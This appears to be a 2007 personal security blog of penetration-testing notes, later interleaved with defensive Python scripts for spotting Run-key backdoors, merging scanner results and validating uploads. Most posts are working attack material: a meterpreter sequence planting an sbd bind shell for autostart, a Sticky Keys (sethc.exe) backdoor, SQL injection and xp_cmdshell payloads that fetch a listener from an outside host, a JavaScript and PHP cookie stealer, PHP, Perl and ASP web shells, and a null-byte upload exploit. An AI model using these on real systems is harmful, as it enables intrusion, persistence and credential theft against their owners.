It's the code garbage collector. Mind dumps of daily coding antics from a frustrated silly little man. VBS, PHP, TCL, TK, PERL, C++, JAVA... what now? Ruby?
No wait... it should be just RUBY!

20070330

Month of ... bugs

1. Month of browser bugs
2. Month of apple bugs
3. Month of kernel bugs
4. Month of PHP bugs
5. Month of MySPACE bugs

eh.. ergg.. cough.. die. this fad is getting old.. I hate even commenting on this at all.

20070328

Setting and confirming reg keys w/meterpreter

Super quick meterpreter sequence.

Prep (upload the sbd Windows binary into system32):
upload c:\\sbdbg.exe c:\\windows\\system32\\

Set (add an autostart value under the HKLM Run key; the binary name must match the uploaded file):
reg setval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor -d "C:\\windows\\system32\\sbdbg.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0"

Verify (list the values under Run, then read back the one just set):
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
reg queryval -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v NotSecurityIssueYourLookingFor

Use:
(reboot)
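The flip side of the sequence above is spotting such an entry during a review. The script below is an added example (not from the original post): it parses the text that `reg query` prints for the Run key and flags values whose command line carries the traits of a netcat-style listener (the -l/-p, -a and -e flags, or a known clone's binary name). The sample output is constructed, not captured from a real host.

```python
import re

# One `reg query` value line: name, type, data separated by runs of spaces.
VALUE_RE = re.compile(r"^\s+(?P<name>.+?)\s{2,}(?P<type>REG_[A-Z_]+)\s+(?P<data>.*?)\s*$")

# Command-line traits of a netcat-style listener (sbd and the other clones).
TRAITS = [
    (re.compile(r"(^|\s)-e\s+\S*(cmd|powershell|sh)(\.exe)?\b", re.I), "spawns a shell with -e"),
    (re.compile(r"(^|\s)-l\b.*(^|\s)-p\s*\d+", re.I), "listens on a port (-l -p)"),
    (re.compile(r"(^|\s)-a\s+\d{1,3}(\.\d{1,3}){3}\b", re.I), "binds an explicit address (-a)"),
    (re.compile(r"(^|[\\/\s\"])(sbd|sbdbg|nc|ncat|cryptcat|socat)(\.exe)?\b", re.I),
     "netcat-clone binary name"),
]

def parse_reg_query(text):
    """Return [(name, type, data)] for every value line in `reg query` output."""
    out = []
    for line in text.splitlines():
        m = VALUE_RE.match(line)
        if m:
            out.append((m["name"], m["type"], m["data"]))
    return out

def review_run_entries(text):
    """[(value name, [reasons])] for autostart entries whose command line looks like
    a bind shell. Feed it the output of `reg query <Run key>` (or the meterpreter
    `reg queryval` output after light reformatting)."""
    flagged = []
    for name, _type, data in parse_reg_query(text):
        reasons = [why for rx, why in TRAITS if rx.search(data)]
        if reasons:
            flagged.append((name, reasons))
    return flagged

# Constructed sample of `reg query HKLM\...\Run` output; not captured from a real host.
SAMPLE = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    NotSecurityIssueYourLookingFor    REG_SZ    C:\windows\system32\sbdbg.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
"""

if __name__ == "__main__":
    for name, reasons in review_run_entries(SAMPLE):
        print(name, "->", "; ".join(reasons))
```

On a live box, pipe `reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run` (and the HKCU twin) into `review_run_entries`; a clean entry list is the expected result.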

20070323

Comparing Common Vulnerability Result Sets

One of the major things I've been working on is bringing together vulnerability result information. I found it a major pain in the ass to remove duplicate entries from result sets. I was finally able to come up with a listing based on CVE / BID tracking numbers:

An example correspondence file could be something like this:

Tenable Nessus 3.0 - to - Harris Guardian Scanner [download txt]

Just extracting Nessus information can be a huge problem. Because of the lack of structure within the NASL scripting language, there are many, many variations in the output generated by the plugins. I've made some additional changes to an old tool:

nessus_extract.pl (version 1.7) [download perl]

I added pipes into the fray, generating a recursive-style CSV that separates BID and CVE numbers, as well as a more robust double-quote word qualifier.

One huge help is the Open Source Vulnerability Database (OSVDB), which has come a long way.
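The de-duplication idea above, as an added example rather than the post's nessus_extract.pl: each scanner's findings are reduced to their CVE/BID tracking numbers (pipe-separated, as the CSV described), findings on the same host that share any tracking number are merged into one issue, and the merged set yields the scanner-to-scanner correspondence rows. The field names and the two sample result sets are assumptions, constructed for the example.

```python
import re
def normalize_ids(cve_field, bid_field):
    """Split pipe/comma separated CVE and BID fields into one set of tracking ids."""
    ids = set()
    for tok in re.split(r"[|,\s]+", cve_field.strip()):
        if re.fullmatch(r"CVE-\d{4}-\d{4,}", tok, re.I):
            ids.add(tok.upper())
    for tok in re.split(r"[|,\s]+", bid_field.strip()):
        if tok.isdigit():
            ids.add("BID-" + tok)
    return frozenset(ids)

def merge_results(sources):
    """sources = {scanner: [{host, id, cve, bid}, ...]}. Findings are the same issue when
    they share a host and any CVE/BID; ones with no tracking number stay separate."""
    merged = []
    for scanner, findings in sources.items():
        for f in findings:
            ids = set(normalize_ids(f.get("cve", ""), f.get("bid", "")))
            if not ids:
                ids = {f"{scanner}:{f['id']}"}
            hits = [m for m in merged if m["host"] == f["host"] and m["ids"] & ids]
            group = hits[0] if hits else {"host": f["host"], "ids": set(), "sources": {}}
            for other in hits[1:]:  # a new finding can bridge two earlier groups
                group["ids"] |= other["ids"]
                for s, refs in other["sources"].items():
                    group["sources"].setdefault(s, []).extend(refs)
                merged.remove(other)
            group["ids"] |= ids
            group["sources"].setdefault(scanner, []).append(f["id"])
            if not hits:
                merged.append(group)
    return merged

def correspondence(merged, left="nessus", right="guardian"):
    """(host, left ids, right ids) rows for issues both scanners reported."""
    return [(m["host"], sorted(m["sources"][left]), sorted(m["sources"][right]))
            for m in merged if left in m["sources"] and right in m["sources"]]

# Constructed sample result sets (not real scanner output; ids are placeholders).
NESSUS = [
    {"host": "10.0.0.5", "id": "11001", "cve": "CVE-2000-0001|CVE-2000-0002", "bid": "1001|1002"},
    {"host": "10.0.0.5", "id": "11002", "cve": "CVE-2000-0002", "bid": ""},
    {"host": "10.0.0.7", "id": "11003", "cve": "", "bid": "1003"},
]
GUARDIAN = [
    {"host": "10.0.0.5", "id": "G-1", "cve": "cve-2000-0001", "bid": ""},
    {"host": "10.0.0.7", "id": "G-2", "cve": "", "bid": "1003"},
    {"host": "10.0.0.7", "id": "G-3", "cve": "", "bid": ""},  # no tracking number at all
]
```

`merge_results({"nessus": NESSUS, "guardian": GUARDIAN})` collapses the five tracked findings into two issues and keeps G-3 as its own untracked entry.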

20070315

Pentest order of objects..

ISSAF was used in conjunction with the latest BackTrack release.
Although it is not my company's standard, it is quite close.

Not to be too open.. but this has led to a really good idea for object-oriented coding.

Information Systems Security Assessment Framework (ISSAF) draft 0.2
ASSESSMENT

INFORMATION GATHERING
-Archive
-DNS
-Route
-SMTP
-Search engine
-Survey
-Whois
NETWORK MAPPING
-Identify Live Hosts
-OS Fingerprinting
-Port Scanning
-Service Fingerprinting
-Identify Border Assets
-(SNMP - MIB Browsing)
-(VPN)
-Web/Public Application Mapping (Crawling)
VULNERABILITY IDENTIFICATION
-(Cisco)
-Database
-Fuzzers
-SMB Analysis
-SNMP Analysis
-Security Scanner
-Web Analysis
PENETRATION
-Exploits (Metasploit)
-Exploits (Core Impact / Canvas)
-Exploits (milw0rm / SecurityFocus)

GAINING ACCESS AND PRIVILEGE ESCALATION

-Password Attacks
-Default Configuration Attacks
-Sniffers
-Spoofing
ENUMERATING FURTHER
-Management Infrastructure (i.e. WMI, SNMP, CDP)
-Pull Passwords (hashes, SAM files)
-Privileged Assessment (Repeat all Steps)
COMPROMISE REMOTE USERS/SITES
-Targeted Phishing
-DNS Poisoning
MAINTAINING ACCESS
-Covert Channels
-Rootkits
-Port Knocking
-Proxy
-Tunnels
COVER THE TRACKS
-House Cleaning

20070313

SBD as netcat

Yeah, so I rattle off some SBD stuff sometimes.. I'm referring to the netcat clone called sbd. SBD is Shadowinteger's Backdoor, located @ http://tigerteam.se/dl/sbd/. This is my preferred "swiss army knife" because of its default configuration of encryption (AES-CBC-128 + HMAC-SHA1) and dangerous execution binding (the -e command option).

Netcat and its NC clones:

  • netcat - "swiss army knife"
  • sbd & sbdbg.exe - shadowinteger's backdoor
  • netcat6 - swiss army knife+ for IPv6
  • cryptcat - netcat with Twofish encryption
  • socat - multipurpose relay (netcat++) with IPv6/SSL. Example usage (listen on IPv6 port 8080 and relay each connection through the HTTP proxy "proxy" to www.domain.com:80):
    socat TCP6-LISTEN:8080,reuseaddr,fork PROXY:proxy:www.domain.com:80

Simpler tools:
None of this is news.. I just wanted to point out some of this simple stuff.

20070308

sbd fun as a rootkit via sethc.exe

SBD fun

Transferring files
RCV: sbd -l -p 4337 > outputfile
XMIT: cat infile | sbd 127.0.0.1 4337 -q 10

Transferring files through .tar.gz
RCV: sbd -l -p 4337 | tar xvfpz -
XMIT: tar zcfp - /path/to/directory | sbd -w 3 127.0.0.1 4337

Port scan:
echo EXIT | sbd -v -w 1 127.0.0.1 20-250 500-600 5990-7000

Using cmd.exe to bind to a service
In my experience this is flaky at best..

Create, then start, the service:
sc create testsvc binpath= "cmd /K start" type= interact
sc start testsvc

Note that this time, SC START immediately creates a new CMD window, even if the original CMD window failed to start with error 1053 (this is expected, since CMD.EXE doesn't have any service-related code in it).

When the SCM starts a service, it expects the binary to register a control handler (the RegisterServiceCtrlHandler API); cmd.exe never does, hence the 1053 timeout.

We may want to fix any C program to actually handle the correct calls if loading it as a legitimate service.

Simple C++ sbd wrapper
(Rename sbdbg.exe to svchost.exe in this example.)
#include <cstdlib>
#include <iostream>

using namespace std;

int main(int argc, char *argv[])
{
    // Let's restrict the address to localhost only.. please.
    // Runs the renamed sbd binary as a listener on 127.0.0.1:4337 that hands out cmd.exe.
    system("c:\\tmp\\svchost.exe -l -p 4337 -a 127.0.0.1 -e cmd.exe -r0");
    return EXIT_SUCCESS;
}


Rootkit portion
Rename the output binary to sethc.exe.. works OK.

Prefetch restrictions
Remember to delete any existing sethc.exe prefetch files in c:\windows\prefetch prior to use.

Interesting note about RDC
Sticky Keys [left shift x5] (sethc.exe) works through Remote Desktop Connections (RDC/RDP). Funny how suddenly that makes this all the more interesting.

Apparently the SYSTEM kernel security shuts down all unknown processes on a sweep @5 minutes into the session.

Could we fake a handler for WM_CLOSE? Or terminate...

20070307

PNG Listener w/logger

This is an example of a simple PNG listener with a logging mechanism.
(Do I really have to explain how to use this?)

<?php
$cookie = $_GET["c"];
if ($cookie == "init") {
    // "init" starts a fresh log file
    $file = fopen('001.txt', 'w');
    fwrite($file, ":: 00* Logger:: \n");
} else {
    // otherwise append the caller's address and the value to the log
    $file = fopen('001.txt', 'a');
    fwrite($file, $_SERVER['REMOTE_ADDR'] . "=>" . $cookie . "\n");
}
fclose($file);
// Answer with a 1x1 PNG so the request looks like an ordinary image load
header("Content-type: image/png");
$im = imageCreate(1, 1);
$background = imageColorAllocate($im, 255, 255, 255);
imagePNG($im);
imageDestroy($im);
?>


I developed this snippet while working on a solution for browser history leaks.

SQL injection and identification

Identify the SQL server through blind SQL injection

http://example.com/index.php?some_var=1/*!40017%20s*/

MySQL is at least 4.0.17 if you get a different result (the /*!40017 ... */ version comment is only executed by MySQL 4.0.17 and newer).

## String based (concat ||) ==> PostgreSQL, Oracle
## String based (concat +) ==> MS-SQL, MS-Access

Normal Union attack
$var$quote_type AND 1=1;--
$var$quote_type AND 1=0;--
$var$quote_type union all select $select_statement where 1=0;--
$var$quote_type AND 1=0 union all select $select_statement;--
$var$quote_type AND 1=0 union all select $select_statement union all select $select_statement2;--


MS-SQL

Check if we are sysadmin (0x73797361646D696E is 'sysadmin' in hex):
IS_SRVROLEMEMBER(convert(varchar,0x73797361646D696E))


Check things like:
MSSQL_OPENQUERY
(select 1 from OPENQUERY([$servername],'select 1'))


MSSQL_OPENROWSET
(select 1 from OPENROWSET('SQLOLEDB','';'sa';'$pass','select 1'))

or
(select 1 from OPENROWSET('SQLOLEDB','';'$user';'$pass','select 1'))


If we have a linked server and sa:
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENQUERY([TMP],'select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\'';')
select count(*) from TMP_TMP
select 1 where 1=(select cmd from TMP_TMP where id=7)
select * from OPENQUERY([TMP],'select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

If already sa:
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select @@version')
select * from OPENROWSET('SQLOLEDB','';;,'select @@version')

Other things to do:
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "CREATE TABLE TMP_TMP (id int identity(1,1),cmd varchar(8000))"'';')
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;insert TMP_TMP exec xp_cmdshell ''dir c:\''')
select * from master..TMP_TMP
select * from OPENROWSET('MSDASQL','DRIVER={SQL Server};SERVER=;','select 1;exec xp_cmdshell ''osql -E -Q "DROP TABLE TMP_TMP"'';')

20070306

reverse-shell from SQL server

So you got the super secret sa password (or they left it blank~?)

osql -Daaa -Usa -Psupersecret -Q "[valid sql statement]"

{SQL template}
osql -Daaa -Usa -Psupersecret -Q "exec xp_cmdshell '[valid shell commands]'"

Pull data back to the SQL server with:

c:\windows\system32\tftp.exe
c:\windows\system32\ftp.exe

Or be obvious:
net user add

On a semi-evil box hoster (serve TFTP or FTP):
sbdbg.exe

{SQL template} set up FTP command script:
ECHO GET sbdbg > script.ftp
ECHO QUIT >> script.ftp

{SQL template} Execute FTP script:
FTP -s:script.ftp -A semi.evil.host.ip

{SQL template} setup reverse shell:
echo sbdbg.exe -l -p 4337 -e cmd.exe > evil.bat

{SQL template} get the time on the server:
Don't forget, ICMP timestamp requests work instead..
time

{SQL template} schedule execution of bat file
at \\sql.vuln.box 04:20 evil.bat

connect from any.evil.ip
sbd sql.vuln.box 4337

Just some simple shell notes:

Image inclusion
PHP (server side - local/remote)
- will parse comments in JPEGs during file inclusions/requires
IE (client side - local)
- will parse the file contents of images

PNG headers (byte layout at the start of the file; every chunk is length, id, data, 4-byte CRC)
\x89\x50\x4e\x47\x0d\x0a\x1a\x0a <= PNG signature
\x00\x00\x00\x0d <= chunk length (13, the size of an IHDR body)
\x77\x6f\x6f\x74 <= chunk id "woot" (a standard file carries "IHDR" here)
\x00\x00\x00\x01 <= width
\x00\x00\x00\x01 <= height (IHDR stores width first, then height)

Comment writers for JPEGs:
edjpgcom

Basic PHP shell
<?php
ob_clean();           // drop any buffered page output so only the command output comes back
system("[command]");
die();
?>


Using echo
For Windows:
echo: ^ (carets) are the escape sequence for cmd.exe redirects and other special characters.
echo ^<html^>^<body^>whatever^</body^>^</html^> > file.ext

Unix:
Write "lol" from echo with hex (no newline) to a file:
echo -en "\x6c\x6f\x6c" > file.ext


SBD (netcat style):
File receiving
sbd -lvp 1234 < NUL > outfile.ext
Banner grabbing
sbd -c off -v www.microsoft.com 80
Binding shell
sbd -lp 4337 -e "cmd.exe /K echo p0wn3d-sh3ll"

Although plink -raw and telnet are not as good, they can work.

Play with cookies

Simple cookie push
<script>
window.location = 'http://someplace.com/stealer.php?cookie=' + document.cookie;
</script>


Cookie view
javascript:alert(document.cookie);


Manipulate cookie
javascript:void(document.cookie="variable=value");


stealer.php
<?php
/* Ethernet's cookie stealer */
/* Put this up on your free site */
$cookie = $_GET['cookie'];
$log = fopen("cookies11.txt", "a");
fwrite($log, $cookie . "\n");
fclose($log);
?>


Other stealers
<?php
$cookie = $_GET["c"];
$file = fopen('000.txt', 'a');
fwrite($file, $cookie . "\n\n");
fclose($file);

// Send the browser back to the page it came from
$Redirect = getenv("HTTP_REFERER");
echo getenv("HTTP_REFERER");

echo "<script>window.location.replace('" . $Redirect . "')</script>";
?>


Perl shell
#!/usr/bin/perl
# Bind shell: listen on $port and hand each connection a copy of $system.
use Socket;
$port   = 911;
$proto  = getprotobyname('tcp');
$system = 'cmd.exe';    # the program handed to each connection
socket(SERVER, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
setsockopt(SERVER, SOL_SOCKET, SO_REUSEADDR, pack("l", 1)) or die "setsockopt: $!";
bind(SERVER, sockaddr_in($port, INADDR_ANY)) or die "bind: $!";
listen(SERVER, SOMAXCONN) or die "listen: $!";
# Accept forever; the third for() clause closes the client socket after each session.
for (; $paddr = accept(CLIENT, SERVER); close CLIENT) {
    # Point stdin/stdout/stderr at the socket, then run the program over it.
    open(STDIN,  ">&CLIENT");
    open(STDOUT, ">&CLIENT");
    open(STDERR, ">&CLIENT");
    system($system);
    close(STDIN);
    close(STDOUT);
    close(STDERR);
}


ASP quicky whoami?
<%
Dim wShell, objNetwork
response.write "Shell Test.."
Set objNetwork = server.CreateObject("WScript.Network")
response.write objNetwork.UserName
Set objNetwork = Nothing
%>


ASP shell
- WshShell.Exec error '80070005' likely
<%
Dim wshell, intReturn
Set wshell = server.CreateObject("wscript.shell")
intReturn = wshell.Run("%comspec% /c dir *.* > c:\test.txt", 0, True)
Response.Write(intReturn)
Set wshell = Nothing
%>


Curl into older PHP servers from chroot skeletons.

<?php
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://www.proveyourworth.net/do_not_render.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$file = curl_exec($ch);
print_r(curl_getinfo($ch)); // transfer details are only populated after curl_exec()
curl_close($ch);

$PATH = '/home/httpd/vhosts/someplace.com/httpdocs/';
echo '<br>Post Curl<br>';
//echo $file;
$data = $file;

print $data;
?>


Null bytes
PHP garbage
The null byte is represented with '%00' in PHP (the URL-encoded form); everything after it is dropped once the string reaches a file function that treats it as a C string:
C:\c99.php%00.jpg

CGI null byte stuff too..
see... PHP null byte

ASP null byte
When a filename is sent using a multipart/form-data POST, the null byte will be
included in the filename variable, thus affecting calls to the FileSystemObject.
(In the filename below, the null byte sits between sbd.exe and .png; it is shown as a space.)

POST /upload_exploit.asp HTTP/1.0
Content-Type: multipart/form-data; boundary=---------------------------AAAAAAAAAAAAA
Host: localhost
Content-Length: 4337
Pragma: no-cache
Cookie: ASPSESSIONID=NOTQUITERANDOM

-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="ExploitFile"; filename="c:\sbd.exe .png"
Content-Type: text/plain

-----------------------------AAAAAAAAAAAAA
Content-Disposition: form-data; name="submit"

Upload
-----------------------------AAAAAAAAAAAAA--
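Both tricks on this page, the null byte in an uploaded filename and the non-standard "woot" chunk in the PNG header listing under the shell notes, are caught by the same upload check. The code below is an added example, not from the original post: `safe_filename` rejects a NUL and strips any drive/directory part, and `png_chunks` walks the chunk list verifying the signature, lengths and CRCs and reporting chunk types a normal encoder never writes. `make_png` builds a constructed 1x1 image so the check runs offline; `KNOWN` is the set of chunk types from the PNG specification.

```python
import struct, zlib
PNG_SIG = b"\x89PNG\r\n\x1a\n"
# Chunk types defined by the PNG spec; anything else is a place to hide data.
KNOWN = {b"IHDR", b"PLTE", b"IDAT", b"IEND", b"tRNS", b"gAMA", b"cHRM", b"sRGB", b"iCCP",
         b"tEXt", b"zTXt", b"iTXt", b"bKGD", b"pHYs", b"sBIT", b"hIST", b"tIME", b"sPLT"}

def safe_filename(name):
    """Reject the %00 trick and strip any drive/directory part before the name is used."""
    if "\x00" in name:
        raise ValueError("null byte in filename")
    name = name.replace("\\", "/").rsplit("/", 1)[-1]
    if not name or name.startswith("."):
        raise ValueError("empty or hidden filename")
    return name

def chunk(ctype, body):
    """Encode one chunk: 4-byte big-endian length, type, data, CRC over type+data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))

def png_chunks(data):
    """Walk the chunk list, verifying signature, lengths, CRCs and IHDR/IEND placement."""
    if not data.startswith(PNG_SIG):
        raise ValueError("bad PNG signature")
    pos, out = len(PNG_SIG), []
    while pos < len(data):
        if pos + 12 > len(data):
            raise ValueError("truncated chunk header")
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        crc = data[pos + 8 + length:pos + 12 + length]
        if len(body) != length or crc != struct.pack(">I", zlib.crc32(ctype + body)):
            raise ValueError("bad length or CRC in chunk %r" % ctype)
        out.append((ctype, length))
        pos += 12 + length
        if ctype == b"IEND":
            break
    if pos != len(data) or not out or out[0][0] != b"IHDR" or out[-1][0] != b"IEND":
        raise ValueError("IHDR must be first, IEND last, with nothing after it")
    return out

def unknown_chunks(data):
    """Chunk types a trusted encoder never writes, such as the "woot" chunk above."""
    return [t for t, _ in png_chunks(data) if t not in KNOWN]

def make_png(extra=()):
    """Constructed 1x1 greyscale PNG; extra=[(type, body)] inserts chunks after IHDR.
    IHDR is width, height (4 bytes each), then bit depth, colour type, and 3 method bytes."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    out = PNG_SIG + chunk(b"IHDR", ihdr) + b"".join(chunk(t, b) for t, b in extra)
    return out + chunk(b"IDAT", zlib.compress(b"\x00\x00")) + chunk(b"IEND", b"")
```

A file whose first chunk is "woot" instead of IHDR, as in the header listing above, fails `png_chunks` outright; a valid image with an extra "woot" chunk passes the CRC check but is reported by `unknown_chunks`.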